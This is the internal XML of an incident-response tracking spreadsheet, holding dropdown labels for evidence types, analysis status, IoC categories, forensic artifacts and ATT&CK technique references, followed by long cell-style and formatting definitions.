  <si>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</si>
  <si>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</si>
  <si>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T1047</t>
  </si>
  <si>
    <t>Windows Management Instrumentation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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1220</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>Avneet Singh; Casey Smith; Praetorian</t>
  </si>
  <si>
    <t>Techniques</t>
  </si>
  <si>
    <t>Subtechniques</t>
  </si>
  <si>
    <t>Tactics</t>
  </si>
  <si>
    <t>FALSE</t>
  </si>
  <si>
    <t>Grand Total</t>
  </si>
  <si>
    <t>Tab</t>
  </si>
  <si>
    <t>Column</t>
  </si>
  <si>
    <t>Values</t>
  </si>
  <si>
    <t>General Options</t>
  </si>
  <si>
    <t>Yes/No</t>
  </si>
  <si>
    <t>Yes</t>
  </si>
  <si>
    <t>No</t>
  </si>
  <si>
    <t>Medium</t>
  </si>
  <si>
    <t>Low</t>
  </si>
  <si>
    <t>Engagement Lead</t>
  </si>
  <si>
    <t>Project Manager</t>
  </si>
  <si>
    <t>Action Items</t>
  </si>
  <si>
    <t>Completed</t>
  </si>
  <si>
    <t>In-progress</t>
  </si>
  <si>
    <t>Not Started</t>
  </si>
  <si>
    <t>Abandoned</t>
  </si>
  <si>
    <t>Incomplete</t>
  </si>
  <si>
    <t>Malware</t>
  </si>
  <si>
    <t>Extracted to Box</t>
  </si>
  <si>
    <t>Available (not yet on Box)</t>
  </si>
  <si>
    <t>Unavailable</t>
  </si>
  <si>
    <t>Unknown</t>
  </si>
  <si>
    <t>Evidence</t>
  </si>
  <si>
    <t>Evidence Type</t>
  </si>
  <si>
    <t>Full disk image</t>
  </si>
  <si>
    <t>VM disk source (VMDK/VHDX)</t>
  </si>
  <si>
    <t>Memory image</t>
  </si>
  <si>
    <t>Triage - Velo IR RAW collector</t>
  </si>
  <si>
    <t>Triage - Velo Fast IR collector</t>
  </si>
  <si>
    <t>Triage - Velo ATA collector</t>
  </si>
  <si>
    <t>Triage - UAC</t>
  </si>
  <si>
    <t>Triage - LRC (triage + memory)</t>
  </si>
  <si>
    <t>Logs</t>
  </si>
  <si>
    <t>AD dump</t>
  </si>
  <si>
    <t>Other</t>
  </si>
  <si>
    <t>To be requested</t>
  </si>
  <si>
    <t>Requested</t>
  </si>
  <si>
    <t>Delivered</t>
  </si>
  <si>
    <t>Requires verification</t>
  </si>
  <si>
    <t>Verified</t>
  </si>
  <si>
    <t>To be assigned</t>
  </si>
  <si>
    <t>Assigned</t>
  </si>
  <si>
    <t>Ongoing analysis</t>
  </si>
  <si>
    <t>Completed analysis</t>
  </si>
  <si>
    <t>Data already destroyed</t>
  </si>
  <si>
    <t>Never provided by a Client</t>
  </si>
  <si>
    <t>Returned to analyst for correction</t>
  </si>
  <si>
    <t>Analysis cancelled</t>
  </si>
  <si>
    <t>Systems of Interest</t>
  </si>
  <si>
    <t>Added for the record</t>
  </si>
  <si>
    <t>No signs of compromise</t>
  </si>
  <si>
    <t>Used by compormised account</t>
  </si>
  <si>
    <t>AIX</t>
  </si>
  <si>
    <t>Mac</t>
  </si>
  <si>
    <t>IoCs</t>
  </si>
  <si>
    <t>Command line</t>
  </si>
  <si>
    <t>Persistence - service name</t>
  </si>
  <si>
    <t>Persistence - scheduled task</t>
  </si>
  <si>
    <t>Mutex</t>
  </si>
  <si>
    <t>INTEL based (not finding)</t>
  </si>
  <si>
    <t>Provided by client</t>
  </si>
  <si>
    <t>Persistence - Service command</t>
  </si>
  <si>
    <t>Filesystem</t>
  </si>
  <si>
    <t>Malicious IP</t>
  </si>
  <si>
    <t>C2</t>
  </si>
  <si>
    <t>Registry key</t>
  </si>
  <si>
    <t>Malicious Domain</t>
  </si>
  <si>
    <t>Legitimate domain used by attacker</t>
  </si>
  <si>
    <t>Hash</t>
  </si>
  <si>
    <t>String</t>
  </si>
  <si>
    <t>Domain User</t>
  </si>
  <si>
    <t>Domain Administrator</t>
  </si>
  <si>
    <t>Enterprise Administrator</t>
  </si>
  <si>
    <t>Local User</t>
  </si>
  <si>
    <t>Local Administrator</t>
  </si>
  <si>
    <t>$MFT</t>
  </si>
  <si>
    <t>$UsnJrnl:$J</t>
  </si>
  <si>
    <t>Amcache.hve (hive)</t>
  </si>
  <si>
    <t>Application.evtx</t>
  </si>
  <si>
    <t>Crowdstrike</t>
  </si>
  <si>
    <t>DEFAULT (hive)</t>
  </si>
  <si>
    <t>Microsoft-Windows-TerminalServices-RDPClient/Operational.evtx</t>
  </si>
  <si>
    <t>SAM (hive)</t>
  </si>
  <si>
    <t>SECURITY (hive)</t>
  </si>
  <si>
    <t>SOFTWARE (hive)</t>
  </si>
  <si>
    <t>SYSTEM (hive)</t>
  </si>
  <si>
    <t>System.evtx</t>
  </si>
  <si>
    <t>Chrome History</t>
  </si>
  <si>
    <t>Edge History</t>
  </si>
  <si>
    <t>Firefox History</t>
  </si>
  <si>
    <t>IE History</t>
  </si>
  <si>
    <t>JumpList</t>
  </si>
  <si>
    <t>LNK</t>
  </si>
  <si>
    <t>Memory</t>
  </si>
  <si>
    <t>Prefetch</t>
  </si>
  <si>
    <t>Amcache/ShimCache</t>
  </si>
  <si>
    <t>Event Details</t>
  </si>
  <si>
    <t>Accessed ($SI)</t>
  </si>
  <si>
    <t>Created ($SI)</t>
  </si>
  <si>
    <t>Change/EntryModified ($SI)</t>
  </si>
  <si>
    <t>Modified ($SI)</t>
  </si>
  <si>
    <t>Created</t>
  </si>
  <si>
    <t>LastModified</t>
  </si>
  <si>
    <t>Last Time Interacted</t>
  </si>
  <si>
    <t>First Time Interacted</t>
  </si>
  <si>
    <t>Target_Accessed</t>
  </si>
  <si>
    <t>Target_Created</t>
  </si>
  <si>
    <t>Accessed ($FN)</t>
  </si>
  <si>
    <t>Created ($FN)</t>
  </si>
  <si>
    <t>Change/EntryModified ($FN)</t>
  </si>
  <si>
    <t>Modified ($FN)</t>
  </si>
  <si>
    <t>Target_Modified</t>
  </si>
  <si>
    <t>System of Interest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</si>
</sst>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 #,##0.00_);_(* \(#,##0.00\);_(* &quot;-&quot;??_);_(@_)"/>
    <numFmt numFmtId="165" formatCode="m/d/yy;@"/>
    <numFmt numFmtId="166" formatCode="mm/dd/yyyy\ hh:mm:ss"/>
    <numFmt numFmtId="167" formatCode="yyyy/mm/dd\ hh:mm:ss"/>
    <numFmt numFmtId="168" formatCode="yyyy\-mm\-dd;@"/>
    <numFmt numFmtId="169" formatCode="yyyy\-mm\-dd\ hh:mm:ss"/>
  </numFmts>
  <fonts count="19">
    <font>
      <sz val="12"/>
      <name val="IBM Plex Sans"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF9C0006"/>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2"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="12"/>
      <color theme="0"/>
      <name val="IBM Plex Sans"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color theme="0"/>
      <name val="IBM Plex Sans"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="IBM Plex Sans"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="IBM Plex Sans"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <color theme="1"/>
      <name val="IBM Plex Sans"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color theme="1"/>
      <name val="IBM Plex Sans"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="IBM Plex Sans"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF0062FF"/>
      <name val="IBM Plex Sans"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="IBM Plex Sans"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FFFF0000"/>
      <name val="IBM Plex Sans"/>
      <family val="2"/>
    </font>
    <font>
      <i/>
      <sz val="12"/>
      <color theme="0"/>
      <name val="IBM Plex Sans"/>
      <family val="2"/>
    </font>
  </fonts>
  <fills count="8">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFC7CE"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF0062FF"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF393939"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFE0E0E0"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF393939"/>
        <bgColor theme="4"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFE5E5E5"/>
        <bgColor rgb="FF393939"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="31">
    <border>
      <left/>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FF393939"/>
      </left>
      <right/>
      <top style="medium">
        <color rgb="FF393939"/>
      </top>
      <bottom style="medium">
        <color rgb="FF393939"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top style="medium">
        <color rgb="FF393939"/>
      </top>
      <bottom style="medium">
        <color rgb="FF393939"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="medium">
        <color rgb="FF393939"/>
      </right>
      <top style="medium">
        <color rgb="FF393939"/>
      </top>
      <bottom style="medium">
        <color rgb="FF393939"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color rgb="FF393939"/>
      </left>
      <right/>
      <top style="thin">
        <color rgb="FF393939"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="thin">
        <color rgb="FF393939"/>
      </right>
      <top style="thin">
        <color rgb="FF393939"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color rgb="FF393939"/>
      </left>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="thin">
        <color rgb="FF393939"/>
      </right>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color rgb="FF393939"/>
      </left>
      <right/>
      <top/>
      <bottom style="thin">
        <color rgb="FF393939"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="thin">
        <color rgb="FF393939"/>
      </right>
      <top/>
      <bottom style="thin">
        <color rgb="FF393939"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FF393939"/>
      </left>
      <right/>
      <top style="medium">
        <color rgb="FF393939"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="medium">
        <color rgb="FF393939"/>
      </right>
      <top style="medium">
        <color rgb="FF393939"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FF393939"/>
      </left>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="medium">
        <color rgb="FF393939"/>
      </right>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="medium">
        <color rgb="FF393939"/>
      </left>
      <right/>
      <top/>
      <bottom style="medium">
        <color rgb="FF393939"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="medium">
        <color rgb="FF393939"/>
      </right>
      <top/>
      <bottom style="medium">
        <color rgb="FF393939"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color rgb="FF393939"/>
      </left>
      <right/>
      <top style="medium">
        <color rgb="FF393939"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="medium">
        <color rgb="FF393939"/>
      </right>
      <top/>
      <bottom style="thin">
        <color rgb="FF393939"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top/>
      <bottom style="medium">
        <color rgb="FF393939"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="medium">
        <color rgb="FF393939"/>
      </right>
      <top style="thin">
        <color rgb="FF393939"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top style="medium">
        <color rgb="FF393939"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top/>
      <bottom style="medium">
        <color rgb="FF0062F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rgb="FFE5E5E5"/>
      </left>
      <right style="thick">
        <color rgb="FFE5E5E5"/>
      </right>
      <top style="thick">
        <color rgb="FFE5E5E5"/>
      </top>
      <bottom style="thick">
        <color rgb="FFE5E5E5"/>
      </bottom>
      <diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="47">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2"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12" fillId="0" borderId="0"/>
    <xf numFmtId="164" fontId="12" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
  </cellStyleXfs>
  <cellXfs count="137">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="44" applyFont="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="14" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" pivotButton="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="2" xfId="0" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="3" xfId="0" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="3" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="3" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="4" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="4" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="4" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="6" fillId="4" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="45" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="14" fontId="10" fillId="0" borderId="0" xfId="45" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="45" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="4" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="4" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="4" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="4" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="7" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="4" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="4" borderId="6" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="5" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="5" borderId="6" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="5" borderId="8" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="7" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="9" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="167" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="4" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="4" borderId="12" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="4" borderId="14" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="11" xfId="0" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="13" xfId="0" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="5" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="5" borderId="6" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="5" borderId="8" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="5" borderId="16" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="17" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="4" borderId="18" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="15" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="5" borderId="16" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="11" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="13" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="17" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="4" borderId="18" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="19" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="4" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="4" borderId="15" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="11" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="13" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="17" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="9" fillId="4" borderId="15" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="0" xfId="0" applyFont="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="20" xfId="0" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="4" borderId="0" xfId="0" applyFont="1" applyFill="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="4" borderId="14" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="165" fontId="7" fillId="6" borderId="0" xfId="45" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="6" borderId="0" xfId="45" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="166" fontId="7" fillId="6" borderId="0" xfId="45" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="6" borderId="21" xfId="45" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="6" borderId="22" xfId="45" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="4" borderId="18" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="45" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="168" fontId="0" fillId="5" borderId="15" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="168" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="168" fontId="0" fillId="4" borderId="2" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1">
      <alignment horizontal="left" vertical="center" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="5" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
